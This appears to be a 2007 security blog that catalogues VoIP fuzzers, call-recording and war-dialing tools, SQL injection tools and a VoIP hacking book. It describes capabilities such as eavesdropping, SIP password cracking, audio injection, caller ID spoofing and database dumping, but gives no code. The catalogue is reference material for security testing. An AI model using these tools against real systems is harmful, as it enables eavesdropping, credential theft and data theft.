CAN SIMULATE CALLS IN USRLOC MODE
USES SYMMETRIC SIGNALING AND THUS SHOULD WORK BEHIND NAT
CAN UPLOAD ANY GIVEN CONTACT TO A REGISTRAR
SEND MESSAGES TO ANY SIP DESTINATION
NAGIOS COMPLIANT RETURN CODES
SEARCH FOR STRINGS IN REPLY WITH SIGNALING EXPRESSION
USE MULTIPLE PROCESSES TO CREATE MORE SERVER LOAD
READ SIP MESSAGE FROM STDIN (E.G. FROM A PIPE `|')
SUPPORTS DNS SRV THROUGH C-ARES OR LIBRULI
SUPPORTS UDP AND TCP TRANSPORT

PROTOS SIP CONFORMANCE TEST SUITE

http://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/#download

THE PURPOSE OF THIS TEST-SUITE IS TO EVALUATE IMPLEMENTATION LEVEL SECURITY AND ROBUSTNESS OF SESSION INITIATION PROTOCOL (SIP) IMPLEMENTATIONS. THE FACTORS BEHIND CHOOSING SIP INCLUDED:

SIP HAS MATURED FROM ACADEMIC INTEREST INTO INDUSTRIAL PROTOCOL WITH POTENTIAL FOR WIDE DEPLOYMENT. HOWEVER, FIELD USAGE APPEARS TO BE IN EARLY STAGES. THIS STAGE OF THE LIFE-CYCLE IS BOTH AN OPPORTUNITY AND A CHALLENGE FROM SOFTWARE VULNERABILITY PROCESS PERSPECTIVE. BY APPLYING THE PROTOS APPROACH IN THIS CONTEXT WE HOPE TO PROVE THAT THE EARLY BIRD CATCHES THE WORM IN SENSE THAT PATCH AND PENETRATE CYCLES WITH RESPECT TO SOME TRIVIAL VULNERABILITIES MAY BE AVOIDED.
FURTHERMORE SIP IS BEING ADOPTED BY THE THIRD GENERATION PARTNERSHIP PROJECT (3GPP) AS PART OF THE THIRD GENERATION MOBILE ARCHITECTURE.
THE SIP FAMILY OF SPECIFICATIONS IS EXPANDING AND SOME ASPECTS ARE UNDER DEVELOPMENT. THIS ENCOURAGES SIP AS A NATURAL CANDIDATE FOR EXPERIMENTING WITH ITERATIVE IMPROVEMENT OF A ROBUSTNESS TEST-SUITE WITH MORE COMPREHENSIVE RELEASES TO FOLLOW.
A HTTP-LIKE ASCII PRESENTATION OF THE SIP MESSAGES MAY INITIALLY ATTRACT MORE SCRIPT-KIDDIE LEVEL HOSTILITY (VULNERABILITY ASSESSMENT) THAN THE RIVAL PROTOCOLS WITH COMPLEX ENCODINGS HAVE ATTRACTED SO FAR. IN THIS TEST-SUITE, THE FOCUS WAS SET ON A SPECIFIC PROTOCOL DATA UNIT (PDU), NAMELY INVITE MESSAGE. RATIONALE BEHIND THIS SELECTION WAS:
TWO IMPORTANT SIP ENTITY TYPES, USER AGENTS AND PROXIES, HAVE TO SUPPORT THE INVITE-METHOD.
SIP USER AGENTS AND SIP PROXIES ARE BY DESIGN READY TO ACCEPT INCOMING INVITATIONS WITHOUT PRIOR SESSION SETUP. THIS EXPOSES A NATURAL ATTACK VECTOR THAT SHOULD BE SCRUTINIZED WITH TOP PRIORITY.
THE INVITE-METHOD CONTAINS A WIDE RANGE OF HEADER-FIELDS AND MAY CARRY SESSION DESCRIPTION PROTOCOL (SDP) DATA. THUS A CONSIDERABLE PORTION OF THE UNDERLYING CODE IS EXPOSED TO TESTING VIA SINGLE PDU-TYPE.

PROTOS H225 PROTOCOL COMPLIANCE

http://www.ee.oulu.fi/research/ouspg/protos/testing/c07/h2250v4/index.html

THE PURPOSE OF THIS TEST-SUITE IS TO EVALUATE IMPLEMENTATION LEVEL SECURITY AND ROBUSTNESS OF H.225.0 IMPLEMENTATIONS. H.225.0 IS A PROTOCOL RESPONSIBLE FOR SIGNALING AND SETTING UP H.323 CALLS. THE FACTORS BEHIND CHOOSING H.225.0 INCLUDED:

H.323 IS THE DE-FACTO STANDARD FOR VOICE OVER IP (VOIP) AND CONFERENCING AND IT IS WIDELY DEPLOYED. MOREOVER, BASED ON LACK OF PRIOR KNOWN VULNERABILITY ANNOUNCEMENTS IT APPEARS THAT THE H.323 HAS NOT BEEN CLOSELY SCRUTINIZED OR IMPLEMENTATIONS ARE UNCOMMONLY ROBUST.
H.225.0 IS THE FIRST AND MOST COMMONLY EXPOSED INTERFACE TO H.323 SESSION ESTABLISHMENT.
H.225.0 MUST BE IMPLEMENTED BY MOST H.323 COMPONENTS, NAMELY BY TERMINALS, GATEWAYS, PROXIES AND MULTI-POINT CONTROL UNITS.
DUE TO FIREWALL UNFRIENDLY AND DYNAMIC BEHAVIOR OF H.323, MANY FIREWALL PRODUCTS CONTAIN COMPLEX H.225.0 PARSING CODE THAT SHOULD BE TESTED FOR ROBUSTNESS DUE TO CRITICAL PLACEMENT OF POTENTIALLY VULNERABLE CODE. THE SCOPE OF THE TEST-SUITE WAS NARROWED TO H.225.0 VERSION 4 SETUP-PDU. RATIONALE BEHIND THIS SELECTION WAS:
SETUP IS THE FIRST MESSAGE SENT TO A TARGET H.323 ENDPOINT UPON CALL SIGNALING, IT IS EASY TO DELIVER TEST-CASES AND TO RESTORE THE IMPLEMENTATION BACK TO ITS INITIAL STATE BY DISCONNECTING.
CERTAIN SECURITY MEASURES CAN BE ENFORCED ONLY AFTER THE SETUP-PDU HAS BEEN PARSED AND IMPLEMENTATIONS ARE BY DESIGN READY TO ACCEPT INCOMING SETUP MESSAGES.
H.225.0 IMPLEMENTS A SUBSET OF RECOMMENDATION Q.931 WHICH IS USED IN ISDN SIGNALING. CERTAIN ELEMENTS OF Q.931 UTILIZE BER ENCODED ASN.1.
MANY INFORMATION ELEMENTS USED IN H.225.0 CAN BE INCLUDED IN SETUP-PDU.
THE USER-USER INFORMATION ELEMENT IN H.225.0 UTILIZES COMPLEX ASN.1 PACKET ENCODING RULES (PER) WHICH ARE ALSO USED IN H.225.0 RAS (REGISTRATION, ADMISSION, AND STATUS) MESSAGES BETWEEN H.323 ENDPOINTS AND GATEKEEPERS.

SIVUS

http://www.vopsecurity.org/index.php

SIVUS IS THE FIRST PUBLICLY AVAILABLE VULNERABILITY SCANNER FOR VOIP NETWORKS THAT USE THE SIP PROTOCOL. SIVUS IS USED PRIMARILY BY DEVELOPERS, ADMINISTRATORS, NETWORK DESIGNERS, MANAGERS AND CONSULTANTS TO VERIFY THE ROBUSTNESS AND SECURITY OF THEIR SIP IMPLEMENTATIONS BY GENERATING THE ATTACKS THAT ARE INCLUDED IN THE SIVUS DATABASE OR BY CRAFTING THEIR OWN SIP MESSAGES USING THE SIP MESSAGE GENERATOR.

VOIPONG

http://www.enderunix.org/voipong/

VOIPONG IS A UTILITY WHICH DETECTS ALL VOICE OVER IP CALLS ON A PIPELINE, AND FOR THOSE WHICH ARE G711 ENCODED, DUMPS ACTUAL CONVERSATION TO SEPARATE WAVE FILES. IT SUPPORTS SIP, H323, CISCO’S SKINNY CLIENT PROTOCOL, RTP AND RTCP. IT'S BEEN WRITTEN IN C LANGUAGE FOR PERFORMANCE REASONS, PROVED TO BE RUNNING ON SOLARIS, LINUX AND FREEBSD; THOUGH IT'S THOUGHT TO COMPILE AND RUN ON OTHER PLATFORMS AS WELL. ON A 45 MBIT/SEC ACTUAL NETWORK TRAFFIC, IT'S BEEN VERIFIED THAT VOIPONG SUCCESSFULLY DETECTED ALL VOIP GATEWAYS AND THE VOIP CALLS. CPU UTILIZATION DURING THE RUN HAS BEEN FOUND RANGING BETWEEN 66% - 80% ON A 256MB RAM, CELERON 1700 MHZ TOSHIBA NOTEBOOK.

SIP TEST TOOL (COMMERCIAL)

http://voip.hcltech.com/artDisplay.asp?art_id=1226&cat_id=523

HCL OFFERS A COMPREHENSIVE SIP TEST TOOL SUITED FOR CONFORMANCE, REGRESSION, INTEGRATION TESTING AND TEST AUTOMATION NEEDS OF SIP BASED COMPONENTS SUCH AS SIP USER AGENT AND SERVER. SIP TEST TOOL CONTAINS A CONFORMANCE TEST SUITE FOR CONFORMANCE TESTING OF DIFFERENT SIP COMPONENTS SUCH AS USER AGENT, PROXY, REGISTRAR, SIP B2BUA, PRESENCE, AND IM SERVERS AND STUN. SIP CONFORMANCE TEST SUITE PROVIDES A NUMBER OF PRE-DEFINED TEST CASES FOR CHECKING THE CONFORMANCE OF PARTICULAR NETWORK COMPONENT UNDER TEST. THESE TEST CASES CHECK FOR A SPECIFIED FUNCTIONALITY AND RETURN THE TEST RESULTS AS PASS, FAIL OR SKIP. SIP TEST TOOL PROVIDES THE HOOKS FOR TEST AUTOMATION AND WITH THE HELP OF APIS, USER CAN AUTOMATE THE ENTIRE TEST PROCESS.

FEATURES OF THE SIP TEST TOOL:

AUTOMATED TEST FRAMEWORK ARCHITECTURE SUITABLE FOR VOIP PROTOCOLS
SINGLE PLATFORM FOR PROTOCOL CONFORMANCE, CALL FLOW, INTEGRATION, REGRESSION TESTING REQUIREMENTS
BETTER PROTOCOL CONFORMANCE AND HIGHER INTEROPERABILITY
TEST AUTOMATION HOOKS FOR EASE OF AUTOMATION
HIGH TEST CASE DENSITY WITH AROUND 1000 READYMADE TEST CASES AVAILABLE
EASY USAGE WITH GUI BASED EXECUTION AND RESULT ANALYSIS
PACKAGING FLEXIBILITY

NOTE: HCL TECHNOLOGIES ALSO HAS A DIAMETER TOOL THAT CAN BE FOUND AT THE BELOW URL.

http://voip.hcltech.com/artdisplay.asp?cat_id=458&art_id=1306

WINSIP

http://www.touchstone-inc.com/winsip.htm

YOU CAN USE WINSIP TO SIMULATE USER INPUT, GENERATE HIGH-QUALITY AUDIO AND VIDEO STREAMS, AND CONTROL IT FROM THE COMMAND LINE TO AUTOMATE TESTING. WINSIP ACTS AS THOUSANDS OF SIMULTANEOUS INDIVIDUAL ENDPOINTS OR CONNECTIONS IN ANY ONE OF THE FOLLOWING MODES OF OPERATION:

INITIATE CALLS
ANSWER CALLS
UNATTENDED ANSWER
REGISTRAR TEST
PROXY SERVER

CODENOMICON DEFENSICS(COMMERCIAL)

http://www.codenomicon.com/products/protocols.shtml

CODENOMICON DEFENSICS OFFERS UNPARALLELED BLACKBOX, NEGATIVE TESTING AGAINST THE BROADEST SET OF APPLICATIONS; SPANNING OVER 130 INTERNET, WIRELESS AND DIGITAL MEDIA PROTOCOLS.

NETIQ VIVINET DIAGNOSTICS (COMMERCIAL)

http://www.netiq.com/products/vd/default.asp

THE NETIQ VIVINET DIAGNOSTICS PRODUCT (VIVINET DIAGNOSTICS) QUICKLY PINPOINTS CALL QUALITY PROBLEMS IN VOICE OVER IP (VOIP) NETWORKS AND EXPLAINS WHY YOU ARE EXPERIENCING REDUCED CALL QUALITY. VIVINET DIAGNOSTICS REDUCES THE TIME NEEDED TO RESOLVE VOICE QUALITY ISSUES AND LESSENS THE SKILLS REQUIRED FOR VOIP TROUBLESHOOTING, IN BOTH PRE- AND POST-DEPLOYMENT ENVIRONMENTS. THOUGH SIMPLE TO USE, THE PRODUCT PROVIDES THE DATA NEEDED TO TROUBLESHOOT COMPLEX VOIP PROBLEMS IN CISCO AND NORTEL ENVIRONMENTS.

OREKA

http://oreka.sourceforge.net/

OREKA IS A MODULAR AND CROSS-PLATFORM SYSTEM FOR RECORDING AND RETRIEVAL OF AUDIO STREAMS. THE PROJECT CURRENTLY SUPPORTS VOIP AND SOUND DEVICE BASED CAPTURE. RECORDINGS METADATA CAN BE STORED IN ANY MAINSTREAM DATABASE. RETRIEVAL OF CAPTURED SESSIONS IS WEB BASED.

OREKA CURRENTLY HAS THE FOLLOWING FEATURES:

RECORD VOIP RTP SESSIONS BY PASSIVELY LISTENING TO NETWORK PACKETS. BOTH SIDES OF A CONVERSATION ARE MIXED TOGETHER AND EACH CALL IS LOGGED AS A SEPARATE AUDIO FILE. WHEN SIP OR CISCO SKINNY (SCCP) SIGNALING IS DETECTED, THE ASSOCIATED METADATA IS ALSO EXTRACTED
RECORD FROM A STANDARD SOUND DEVICE (E.G. MICROPHONE OR LINE INPUT). CAN RECORD MULTIPLE CHANNELS AT THE SAME TIME. EACH RECORDING GOES TO SEPARATE AUDIO FILES
OPEN PLUGIN ARCHITECTURE FOR AUDIO CAPTURE MEANS THAT THE SYSTEM IS POTENTIALLY CAPABLE OF RECORDING FROM ANY AUDIO SOURCE
PLUGIN ARCHITECTURE FOR CODECS OR ANY OTHER SIGNAL PROCESSING FILTER
AUTOMATIC AUDIO SEGMENTATION SO THAT CONTINUOUS AUDIO SOURCES CAN BE SPLIT IN SEPARATE AUDIO FILES AND EASILY RETRIEVED LATER
CAPTURE FROM MULTIPLE NETWORK DEVICES IN PARALLEL
CAPTURE FROM PCAP TRACE FILES
VOICE ACTIVITY DETECTION
A-LAW, U-LAW AND GSM6.10 CODECS SUPPORTED AS BOTH WIRE AND STORAGE FORMAT
AUTOMATIC TRANSCODING FROM WIRE FORMAT TO STORAGE FORMAT
RECORDING METADATA LOGGED TO FILE AND/OR ANY MAINSTREAM DATABASE SYSTEM USER INTERFACE RECORDINGS RETRIEVAL CAN BE DONE USING THE FOLLOWING CRITERIA (WHEN AVAILABLE):
TIMESTAMP
RECORDING DURATION
DIRECTION (FOR A TELEPHONE CALL)
REMOTE PARTY (FOR A TELEPHONE CALL)
LOCAL PARTY (FOR A TELEPHONE CALL)

COMPATIBILITY:
OREKA HAS BEEN REPORTED TO WORK ON THE FOLLOWING PLATFORMS AND SHOULD ACTUALLY WORK ON MANY MORE.

CISCO CALLMANAGER AND CALLMANAGER EXPRESS V. 3.X, 4.X AND 5
LUCENT APX8000
AVAYA S8500
SIEMENS HIPATH
VOCALDATA
SYLANTRO
ASTERISK SIP CHANNEL

IWAR

http://www.softwink.com/iwar/

CURRENT FEATURES:

FULL AND NORMAL LOGGING: FULL LOGGING RECORDS ALL POSSIBLE EVENTS DURING DIALING (BUSY SIGNALS, NO ANSWERS, CARRIERS, ETC). BY DEFAULT IT ONLY RECORDS THINGS THAT WE MIGHT FIND INTERESTING (CARRIERS, POSSIBLE TELCO EQUIPMENT).
ASCII FLAT FILE AND MYSQL LOGGING: YOU CAN LOG TO A TRADITIONAL ASCII FLAT FILE, AND RECORD INFORMATION INTO A MYSQL DATABASE.
DIALS RANDOMLY OR SEQUENTIALLY.
REMOTE SYSTEM IDENTIFICATION: WHEN FINDING A REMOTE MODEM AND CONNECTING, IWAR WILL REMAIN CONNECTED AND ATTEMPT TO IDENTIFY THE REMOTE SYSTEM TYPE.
KEY STROKE MARKING: WHEN ACTIVELY "LISTENING" TO IWAR WORK, IF YOU HEAR SOMETHING INTERESTING, YOU CAN MANUALLY "MARK" IT BY HITTING A KEY. YOU CAN ALSO ENTER A "NOTE" ABOUT SOMETHING YOU FIND INTERESTING.
MULTIPLE MODEM SUPPORT, BECAUSE… WELL, HEY - THIS IS "UNIX". IWAR WILL SUPPORT AS MANY MODEMS YOU CAN HOOK UP
NICE "CURSES" BASED DISPLAY. THIS MEANS THAT IF YOU'RE USING IWAR FROM A LINUX CONSOLE OR A VT100 BASED TERMINAL, IT SHOULD WORK FINE. IT'S NOT A ESCAPE SEQUENCE KLUDGE, BUT TRUE "CURSES".
FULL CONTROL OVER THE MODEM: UNLIKE OTHER 'KLUDGES', IWAR DOESN'T JUST OPEN THE MODEM AS A TYPICAL "FILE". IT CONTROLS THE BAUD RATE, PARITY, AND CTS/RTS (HARDWARE FLOW CONTROL) DTR (DATA TERMINAL READY). THIS IS IMPORTANT FOR CONTROLLING THE MODEM AND MAKING IT PREFORM THE WAY YOU WANT IT TO DURING SCANNING. FOR EXAMPLE, DTR HANG UPS.
BLACKLISTED PHONE NUMBER SUPPORT: FOR NUMBERS THE SYSTEM SHOULD NEVER DIAL.
SAVE STATE: IF WITHIN THE MIDDLE OF A "WARDIALING" SESSION YOU WANT TO QUIT, YOU CAN SAVE THE CURRENT STATE TO A FILE. THIS ALLOWS YOU TO COME BACK LATER AND RESTART IWAR WHERE YOU LEFT OFF. (VIA THE '-L' OPTION)
LOAD PRE-GENERATED NUMBERS: YOU CAN LOAD A FILE (VIA THE '-L' OPTION) OF NUMBERS THAT YOU WANT TO DIAL. THIS IS USEFUL IF YOU WANT TO LOAD NUMBERS GENERATED BY ANOTHER ROUTINE (PERL/SHELL SCRIPT/ETC).
TONE LOCATION, IF YOUR MODEM SUPPORTS IT. IWAR USES TWO DIFFERENT METHODS. THE TRADITIONAL "ATDT5551212W;" (TONELOC) AND "SILENCE" DETECTION.
RECORDS REMOTE SYSTEM BANNERS ON CONNECTION FOR LATER REVIEW
IWAR CAN BE USED TO ATTACK PBX'S AND VOICE MAIL SYSTEMS
TERMINAL WINDOW SO YOU CAN WATCH MODEM INTERACTIONS AND CARRIER RESULTS IN REAL TIME
SUPPORT THE IAX2 (INTRA-ASTERISK EXCHANGE) "VOICE OVER IP" (VOIP) PROTOCOL. THIS ALLOWS YOU TO SCAN WITHOUT THE NEED OF ADDITIONAL HARDWARE! TO MY KNOWLEDGE, IWAR IS THE FIRST WAR DIALER WITH VOIP FUNCTIONALITY
IN IAX2 MODE, IWAR ACTS AS A "FULL BLOWN" VOIP CLIENT. IN THIS MODE, KEY 0-9, * AND # PLAY THERE DTMF EQUIVALENTS. IN THIS MODE, YOU CAN ALSO DIRECTLY "TALK" (USING A MICROPHONE) WITH THE REMOTE TARGET IF SO DESIRED.
IN IAX2 MODE, IF YOUR VOIP PROVIDER SUPPORTS IT, YOU CAN "SET" YOUR CALLER ID NUMBER (CALLER ID SPOOFING).
COMES WITH COMPLETE SOURCE CODE AND IS RELEASED UNDER THE GNU GENERAL PUBLIC LICENSE.

SIP TASTIC

http://www.isecpartners.com/sip_tastic.html

SIP.TASTIC IS A PASSIVE DICTIONARY ATTACK TOOL ON SIP'S DIGEST AUTHENTICATION METHOD. THE PROGRAM IS WRITTEN PRIMARILY TO TEST VOIP NETWORKS THAT USE SIP FOR SESSION SETUP. THE PROOF OF CONCEPT TOOL SHOWS HOW THE DIGEST AUTHENTICATION PROCESS USED BY SIP ENDPOINTS IS VULNERABLE TO AN OFFLINE BRUTE-FORCE ATTACK. THIS ATTACK ALLOWS MALICIOUS USERS TO STEAL PASSWORDS AND HIJACK ENDPOINT IDENTITIES.

RTPINJECT

http://www.isecpartners.com/rtpinject.html

RTPINJECT IS A MINIMAL-SETUP PREREQUISITES ATTACK TOOL THAT INJECTS ARBITRARY AUDIO INTO ESTABLISHED RTP CONNECTIONS. THIS PROGRAM IS WRITTEN PRIMARILY TO DEMONSTRATE THE VULNERABILITY OF THE UNDERLYING MEDIA LAYER FOR VOIP NETWORKS. THE TOOL IDENTIFIES ACTIVE CONVERSATIONS, ENUMERATES THE MEDIA CODEC IN USE, AND ALLOWS FOR THE INJECTION OF AN ARBITRARY AUDIO FILE THAT IS AUTOMATICALLY TRANSCODED INTO THE NECESSARY FORMAT REQUIRED.

H.323 INJECTION FILES

http://www.isecpartners.com/h_323_injection_files.html

H.323 INJECTION FILES CAN BE USED WITH NEMESIS, A PACKET INJECTION TOOL, FOR A VARIETY OF ATTACKS ON H.323 NETWORKS. ATTACKS FILES INCLUDE REPLAY ATTACKS AND DENIAL OF SERVICE.

SQL INJECTION

2007-11-22T21:22:00.000-08:00

PRIAMOS

http://www.priamos-project.com/whatis.htm

PRIAMOS IS A POWERFUL SQL INJECTOR & SCANNER
YOU CAN SEARCH SQL INJECTION VULNERABILITIES AND INJECT VULNERABLE STRING TO GET ALL DATABASES, TABLES AND COLUMN DATA WITH INJECTOR MODULE.

ABSINTHE

http://www.0x90.org/releases/absinthe/

ABSINTHE IS A GUI-BASED TOOL THAT AUTOMATES THE PROCESS OF DOWNLOADING THE SCHEMA & CONTENTS OF A DATABASE THAT IS VULNERABLE TO BLIND SQL INJECTION.

ABSINTHE DOES NOT AID IN THE DISCOVERY OF SQL INJECTION HOLES. THIS TOOL WILL ONLY SPEED UP THE PROCESS OF DATA RECOVERY.

FEATURES:

AUTOMATED SQL INJECTION
SUPPORTS MS SQL SERVER, MSDE, ORACLE, POSTGRES
COOKIES / ADDITIONAL HTTP HEADERS
QUERY TERMINATION
ADDITIONAL TEXT APPENDED TO QUERIES
SUPPORTS USE OF PROXIES / PROXY ROTATION
MULTIPLE FILTERS FOR PAGE PROFILING
CUSTOM DELIMITERS

BSQLBF 1.1 - BLIND SQL INJECTION TOOL

http://www.514.es/html/2006/04/05

THE AUTHOR SAYS THERE ARE SIMILAR TOOLS ABOUT, BUT HE'S TRIED TO COMBINE ALL THE TECHNIQUES INTO ONE COMPACT BUT COMPLETE TOOL.

NOTE: WEBSITE OF WHERE THE TOOL IS LOCATED IS IN SPANISH

BOBCAT

http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html

BOBCAT IS A TOOL TO AID A SECURITY CONSULTANT IN TAKING FULL ADVANTAGE OF SQL INJECTION VULNERABILITIES. IT IS BASED ON A TOOL NAMED "DATA THIEF" THAT WAS PUBLISHED AS POC BY APPSECINC. BOBCAT CAN LIST THE LINKED SEVERS, DATABASE SCHEMA, AND ALLOW THE RETRIEVAL OF DATA FROM ANY TABLE THAT THE CURRENT APPLICATION USER HAS ACCESS TO.

THE METHODS THAT BOBCAT INCORPRATES ARE BASED ON THOSE DISCUSSED IN THE FOLLOWING PAPERS:

ADVANCED SQL INJECTION
MORE ADVANCED SQL INJECTION
ADVANCED SQL INJECTION
MANIPULATING SQL SERVER USIG SQL INJECTION

SQLMAP

http://sqlmap.sourceforge.net/

SQLMAP IS AN AUTOMATIC BLIND SQL INJECTION TOOL, DEVELOPED IN PYTHON, CAPABLE TO PERFORM AN ACTIVE DATABASE MANAGEMENT SYSTEM FINGERPRINT, ENUMERATE ENTIRE REMOTE DATABASES AND MUCH MORE. THE AIM OF THIS PROJECT IS TO IMPLEMENT A FULLY FUNCTIONAL DATABASE MANAGEMENT SYSTEM TOOL WHICH TAKES ADVANTAGES OF WEB APPLICATION PROGRAMMING SECURITY FLAWS WHICH LEAD TO SQL INJECTION VULNERABILITIES.

SQLPING

http://www.sqlsecurity.com/Tools/FreeTools/tabid/65/Default.aspx

GUI VERSION OF SQLPING THAT ALSO INCLUDES IP RANGE SCANNING AND BRUTE FORCING PASSWORD CHECKING. ON A LARGE DEVELOPMENT NETWORK, PUT IN THE NETWORK BROADCAST ADDRESS IN THE DISCOVERY FORM. HOW MANY SQL SERVERS CAN YOU FIND?

SQLRECON

http://www.sqlsecurity.com/Tools/FreeTools/tabid/65/Default.aspx

SQLRECON PERFORMS BOTH ACTIVE AND PASSIVE SCANS OF YOUR NETWORK IN ORDER TO IDENTIFY ALL OF THE SQL SERVER/MSDE INSTALLATIONS IN YOUR ENTERPRISE. DUE TO THE PROLIFERATION OF PERSONAL FIREWALLS, INCONSISTENT NETWORK LIBRARY CONFIGURATIONS, AND MULTIPLE-INSTANCE SUPPORT, SQL SERVER INSTALLATIONS ARE BECOMING INCREASINGLY DIFFICULT TO DISCOVER, ASSESS, AND MAINTAIN. SQLRECON IS DESIGNED TO REMEDY THIS PROBLEM BY COMBINING ALL KNOWN MEANS OF SQL SERVER/MSDE DISCOVERY INTO A SINGLE TOOL WHICH CAN BE USED TO FERRET-OUT SERVERS YOU NEVER KNEW EXISTED ON YOUR NETWORK SO YOU CAN PROPERLY SECURE THEM. .NET FRAMEWORK V1.1 REQUIRED. (NOTE: DUE TO .NET POLICY RESTRICTIONS ON MOST COMPUTERS, YOU'LL NEED TO EXECUTE THE SQLRECON.EXE PROGRAM FROM A LOCAL DRIVE IN ORDER TO GET THE FULL FUNCTIONALITY)

DOCUMENTATION AVAILABLE AT:

http://www.specialopssecurity.com/labs/sqlrecon

VULNERABILITY SCAN SCRIPT

http://www.sqlsecurity.com/Tools/FreeTools/tabid/65/Default.aspx

THIS IS A VULNERABILITY SCANNING SCRIPT SUBMITTED BY CARLOS PEREZ. IT SCANS YOUR SQL SERVER INSTANCE LOOKING FOR MISCONFIGURATIONS OR INSECURE SETTINGS THAT YOU SHOULD INVESTIGATE.

SQID

http://sqid.rubyforge.org/

SQL INJECTION DIGGER IS A COMMAND LINE PROGRAM THAT LOOKS FOR SQL INJECTIONS AND COMMON ERRORS IN WEBSITES. IT CAN PERFORM THE FOLLWING OPERATIONS:

LOOK FOR SQL INJECTION IN A WEBPAGE, BY LOOKING FOR LINKS.
SUBMIT FORMS IN A WEBPAGE TO LOOK FOR SQL INJECTION.
CRAWL A WEBSITE TO PERFORM THE ABOVE LISTED OPERATIONS.
PERFORM A GOOGLE SEARCH FOR A QUERY AND LOOK FOR SQL INJECTIONS IN THE URLS FOUND.

SQID IS WRTTEN IN RUBY AND ADDITIONALLY REQUIRES HTTP-ACCESS2 MODULE FOR OPERATION. FIND OUT MORE ABOUT SQL INJECTION.
SQID IS EXTENSIBLE BY ADDING MORE SIGNATURES TO ITS DATABASE (SQID.DB). THE SIGNATURES SIMPLY USE REGULAR EXPRESSIONS.
CURRENT VERSION LOOKS FOR SQL INJECTIONS AND COMMON ERRORS IN WEBSITE URLS FOUND BY PERFORMING A GOOGLE SEARCH. THE USE OF GOOGLE SEARCH SOAP API HAS BEEN REMOVED DUE TO NO MORE ISSUING OF KEYS. NOW IT DIRECTLY PERFORMS SEARCH OVER THE WEB.

SQLBRUTE

http://www.securiteam.com/tools/5IP0L20I0E.html

SQLBRUTE – MULTI THREADED BLIND SQL INJECTION BRUTEFORCER

WEBGOAT

http://www.owasp.org/software/webgoat.html

WEBGOAT IS WRITTEN IN JAVA AND THEREFORE INSTALLS ON ANY PLATFORM WITH A JAVA VIRTUAL MACHINE. THERE ARE AUTOMATED INSTALLERS FOR LINUX, OS X TIGER AND WINDOWS.

CURRENT LESSONS INCLUDE:

CROSS SITE SCRIPTING
SQL INJECTION
THREAD SAFETY
HIDDEN FORM FIELD MANIPULATION
PARAMETER MANIPULATION
WEAK SESSION COOKIES
FAIL OPEN AUTHENTICATION
DANGERS OF HTML COMMENTS
WEB SERVICES LESSONS
BLIND SQL LESSON
WEAK SESSION IDENTIFIER LESSON
SPLIT SQL LESSON INTO NUMERIC AND STRING SQL LESSONS
ADDED PARAMETERIZED QUERY STAGE TO SQL LESSONS
ADDITIONAL STAGE FOR BASIC AUTHENTICATION LESSON
SUMMARY REPORT CARD FOR MULTI-USER ENVIRONMENT

PIXY

2007-11-22T21:20:00.000-08:00

THE SECURE SYSTEMS LAB AT THE TECHNICAL UNIVERSITY OF VIENNA HAS RELEASED THE NEWEST VERSION OF PIXY, AN OPEN-SOURCE VULNERABILITY SCANNER. HERE ARE SOME OF THE HIGHLIGHTS:

* DETECTION OF SQL INJECTION AND XSS VULNERABILITIES IN PHP SOURCE CODE
* AUTOMATIC RESOLUTION OF FILE INCLUSIONS
* COMPUTATION OF DEPENDENCE GRAPHS THAT HELP YOU UNDERSTAND THE CAUSES OF REPORTED VULNERABILITIES
* STATIC ANALYSIS ENGINE (FLOW-SENSITIVE, INTERPROCEDURAL, CONTEXT-SENSITIVE)
* PLATFORM-INDEPENDENT (WRITTEN IN JAVA)

http://pixybox.seclab.tuwien.ac.at/pixy/

ISR-SQLGET

2007-11-22T21:18:00.000-08:00

ISR-SQLGET: IT'S A BLIND SQL INJECTION TOOL DEVELOPED IN PERL. IT LETS YOU GET DATABASES SCHEMAS AND TABLES ROWS. USING A SINGLE GET/POST YOU CAN ACCESS QUIETLY THE DATABASE STRUCTURE AND USING A SINGLE GET/POST YOU CAN DUMP EVERY TABLE ROW TO A CSV-LIKE FILE.

DATABASES SUPPORTED:

- IBM DB2
- MICROSOFT SQL SERVER
- ORACLE
- POSTGRES
- MYSQL
- IBM INFORMIX
- SYBASE
- HSQLDB (WWW.HSQLDB.ORG)
- MIMER (WWW.MIMER.COM)
- PERVASIVE (WWW.PERVASIVE.COM)
- VIRTUOSO (VIRTUOSO.OPENLINKSW.COM)
- SQLITE
- INTERBASE/YAFFIL/FIREBIRD (BORLAND)
- H2 (HTTP:WWW.H2DATABASE.COM)
- MCKOI (HTTP:MCKOI.COM/DATABASE/)
- INGRES (HTTP:WWW.INGRES.COM)
- MONETDB (HTTP:WWW.MONETDB.NL)
- MAXDB (WWW.MYSQL.COM/PRODUCTS/MAXDB/)
- THINKSQL (HTTP:WWW.THINKSQL.CO.UK/)
- SQLBASE (HTTP:WWW.UNIFY.COM)

http://www.infobyte.com.ar/development.html

Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions

2007-11-21T03:30:00.000-08:00

Paperback: 539 pages
Publisher: McGraw-Hill Osborne Media; 1 edition (November 28, 2006)
Language: English
ISBN-10: 0072263644

Sidestep VoIP Catastrophe the Foolproof Hacking Exposed Way

“This book illuminates how remote users can probe, sniff, and modify your phones, phone switches, and networks that offer VoIP services. Most importantly, the authors offer solutions to mitigate the risk of deploying VoIP technologies.” –Ron Gula, CTO of Tenable Network Security

Block debilitating VoIP attacks by learning how to look at your network and devices through the eyes of the malicious intruder. Hacking Exposed VoIP shows you, step-by-step, how online criminals perform reconnaissance, gain access, steal data, and penetrate vulnerable systems. All hardware-specific and network-centered security issues are covered alongside detailed countermeasures, in-depth examples, and hands-on implementation techniques. Inside, you’ll learn how to defend against the latest DoS, man-in-the-middle, call flooding, eavesdropping, VoIP fuzzing, signaling and audio manipulation, Voice SPAM/SPIT, and voice phishing attacks.

Find out how hackers footprint, scan, enumerate, and pilfer VoIP networks and hardware
Fortify Cisco, Avaya, and Asterisk systems
Prevent DNS poisoning, DHCP exhaustion, and ARP table manipulation
Thwart number harvesting, call pattern tracking, and conversation eavesdropping
Measure and maintain VoIP network quality of service and VoIP conversation quality
Stop DoS and packet flood-based attacks from disrupting SIP proxies and phones
Counter REGISTER hijacking, INVITE flooding, and BYE call teardown attacks
Avoid insertion/mixing of malicious audio
Learn about voice SPAM/SPIT and how to prevent it
Defend against voice phishing and identity theft scams

About the Author
David Endler is the Director of Security Research for TippingPoint, a division of 3Com. Previously, he performed security research for Xerox Corporation, the NSA, and MIT. Endler is also the chairman and founder of the Voice over IP Security Alliance.

